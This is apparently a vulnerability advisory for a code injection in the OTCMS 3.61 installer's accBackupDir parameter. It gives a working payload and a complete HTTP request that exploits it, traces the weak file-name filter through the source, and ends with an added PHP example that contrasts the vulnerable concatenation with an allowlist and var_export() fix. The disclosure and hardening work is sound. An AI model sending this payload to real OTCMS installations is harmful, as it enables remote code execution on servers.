OTCMS 3.61 Command Execution

Description

The OTCMS 3.61 installer (install/index.php) takes the POSTed accBackupDir value, runs it through a filter intended for file names only, and then writes it into PHP that the site later executes. The shape of the payload (a',phpinfo(),'a) shows that the value lands inside a single-quoted PHP string literal: the leading quote terminates that literal, phpinfo() is inserted as a PHP expression, and the trailing 'a reopens a string so the generated code still parses. Any PHP expression can be substituted for phpinfo(), which makes this a remote code execution during installation.


Affected parameter: accBackupDir

Payload: accBackupDir=a',phpinfo(),'a


Request Packet:


POST /OTCMS_PHP_V3.61_20180806/install/index.php?mudi=run HTTP/1.1
Host: 192.168.159.148
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.148/OTCMS_PHP_V3.61_20180806/install/index.php?mudi=config
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cookie: qshZy_userID=1; qshZy_username=ss123; qshZy_userInfo=AjsBD10hD39QMA9uWGoCDlNmUTRZZVY1UmIEMAcxCzgDMw44DDYBOlUxBWRbaAI1VzBQM1FrAGBRNFFkVGVROAJvATJdZg9uUGQPOFhsAjZTDFEPWQhWZlIvBDIHfgsw; qshZy_usercall=ssssss; PHPSESSID=mubrngtpmvp2dvpuaoe7pkfgb0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

adminName=admin&adminPwd=admin&adminDir=admin&dbType=mysql&accName=&accDir=&sqlIp=localhost&sqlPo=3306&sqlUsername=root&sqlUserPwd=123.a&sqlDbName=OTCMS&sqlPref=OT_&isImport=2&mysqlState=1&accBackupDir=a',phpinfo(),'a



After the installer has processed the request, visit the homepage; the injected phpinfo() call runs when the generated PHP is loaded:
http://192.168.159.148/OTCMS_PHP_V3.61_20180806/

Code analysis


install/index.php, line 83: the mudi=run action dispatches to run()
    case 'run':
        WebTop();
        run();
        WebBottom();

        break;

install/index.php, line 862: run() reads the installer form fields

function run(){
    global $DB,$dbServerName,$dbName;

    $adminName      = OT::PostStr('adminName');
    $adminPwd       = OT::PostStr('adminPwd');
    $adminDir       = OT::PostRegExpStr('adminDir','fileName');

    $isSkipChk      = OT::PostInt('isSkipChk');
    $dbType         = OT::PostStr('dbType');
    $accDir         = OT::PostRegExpStr('accDir','fileName');
    $accName        = OT::PostRegExpStr('accName','fileName');

    $sqlIp          = OT::PostStr('sqlIp');
    $sqlPo          = OT::PostInt('sqlPo');
    $sqlUsername    = OT::PostStr('sqlUsername');
    $sqlUserPwd     = OT::PostStr('sqlUserPwd');
    $sqlDbName      = OT::PostStr('sqlDbName');
    $sqlPref        = OT::PostStr('sqlPref');
    $isImport       = OT::PostInt('isImport');
    $isMysqlClass   = OT::PostInt('isMysqlClass');

    // The injectable field: only the 'fileName' regex is applied to it.
    $accBackupDir   = OT::PostRegExpStr('accBackupDir','fileName');

    // (remainder of run() not shown in the original post)


OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classOT.php, line 55: PostRegExpStr() is a thin wrapper around Str::RegExp()

    public static function PostRegExpStr($str,$repType){
        return Str::RegExp(@$_POST[$str],$repType);
    }

OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classStr.php, line 276: the 'fileName' case of Str::RegExp()

    case 'fileName':
        $pattern = "/(\\\\|\\/|\\:|\\*|\\?|\\\"|<|>|\|)/i";
        return preg_replace($pattern,'',$str);
        break;

Why the filter is bypassed: the 'fileName' branch is a denylist that removes only the characters Windows forbids in file names (\ / : * ? " < > |). It leaves single quotes, commas and parentheses untouched, so a',phpinfo(),'a reaches the rest of the installer unchanged. A filter written for file names is not a filter for PHP source: once the value is concatenated into a single-quoted PHP string, the first quote closes the string and everything after it is parsed as code. The safe pattern is to reject any directory name that does not match a strict allowlist (for example [A-Za-z0-9_-]) and, when writing the value into PHP, to emit it with var_export() instead of string concatenation.

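The following is an added example, not code from OTCMS or from the original post. It re-implements the 'fileName' branch of Str::RegExp with the exact pattern quoted above, confirms that the payload passes through untouched, and contrasts the denylist with an allowlist plus var_export() that would have blocked it. The post does not show the file the installer writes; because a comma-separated payload only parses inside an array literal or an argument list, the example assumes the value is dropped into a single-quoted string inside an array literal. The function names and the config-fragment layout are hypothetical.

```php
<?php
// Added example, not OTCMS code. Function names are hypothetical.

// Exact pattern from the 'fileName' case of Str::RegExp (inc/classStr.php):
// it strips only \ / : * ? " < > |, the characters Windows forbids in file names.
function otcmsFileNameFilter(string $str): string
{
    $pattern = "/(\\\\|\\/|\\:|\\*|\\?|\\\"|<|>|\|)/i";
    return preg_replace($pattern, '', $str);
}

// ASSUMPTION: the installer concatenates the value into a single-quoted string
// inside an array literal. The post does not show the generated file; this
// context is chosen because the comma-separated payload only parses inside an
// array literal or an argument list.
function renderConfigVulnerable(string $value): string
{
    return "\$OTCfg = array('accBackupDir' => '" . $value . "');";
}

// Hardened input handling: reject anything outside a strict allowlist instead
// of stripping a handful of characters from an otherwise arbitrary string.
function safeDirName(string $str): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $str) === 1 ? $str : null;
}

// Hardened output handling: var_export() produces a correctly escaped PHP
// literal, so a quote inside the value can no longer terminate the string.
function renderConfigSafe(string $value): string
{
    return "\$OTCfg = array('accBackupDir' => " . var_export($value, true) . ");";
}

$payload = "a',phpinfo(),'a";

// 1. The denylist removes nothing: no character of the payload is in the pattern.
$filtered = otcmsFileNameFilter($payload);
assert($filtered === $payload);

// 2. Concatenated into the assumed fragment, the quote closes the string and the
//    fragment becomes three array elements, one of which is a phpinfo() call that
//    executes as soon as the generated file is included.
$vulnerable = renderConfigVulnerable($filtered);
assert($vulnerable === "\$OTCfg = array('accBackupDir' => 'a',phpinfo(),'a');");

// 3. An allowlist rejects the payload outright but accepts a real directory name.
assert(safeDirName($payload) === null);
assert(safeDirName('bak_2018') === 'bak_2018');

// 4. Even if a quote were allowed through, var_export() keeps it inside the
//    literal (it becomes \'), so the fragment stays a single string element.
$safe = renderConfigSafe($payload);
assert($safe === "\$OTCfg = array('accBackupDir' => 'a\\',phpinfo(),\\'a');");

echo "vulnerable fragment: " . $vulnerable . PHP_EOL;
echo "hardened fragment  : " . $safe . PHP_EOL;
```

Run it with php 7.1 or later (nullable return types) and zend.assertions enabled; the assertions document the before/after fragments without executing either of them. The allowlist check is the important half: escaping alone keeps the PHP file well-formed, but a directory name that the installer later passes to the filesystem should never contain quotes or path separators in the first place.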